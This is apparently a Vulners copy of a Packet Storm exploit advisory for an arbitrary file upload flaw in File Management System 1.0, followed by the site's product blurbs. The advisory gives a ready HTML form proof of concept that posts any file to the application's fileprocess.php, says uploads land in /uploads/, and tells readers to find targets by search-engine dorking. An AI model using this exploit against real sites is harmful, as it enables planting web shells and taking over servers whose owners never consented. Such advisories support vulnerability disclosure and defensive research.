Lucene search
K

File Management System 1.0 Arbitrary File Upload

🗓️ 28 Aug 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 308 Views

File Management System 1.0 Arbitrary File Upload vulnerability on Windows 10 with Mozilla Firefox 128.0.

Code
`=============================================================================================================================================  
| # Title : File Management System 1.0 Arbitrary File upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] Line 1 : Set your target.  
  
[+] Save As poc.html  
  
[+] Payload :  
  
<form name="" action="http://127.0.0.1/filemanagement/Private_Dashboard/fileprocess.php" method="POST" enctype="multipart/form-data">  
<!-- Hidden Email Input -->  
<input type="hidden" name="email" value="">  
  
<!-- File Input -->  
<label for="myfile">Upload File:</label>  
<input type="file" id="myfile" name="myfile" required>  
  
<!-- Submit Button -->  
<input type="submit" name="save" value="Save">  
</form>  
  
[+] /uploads/  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation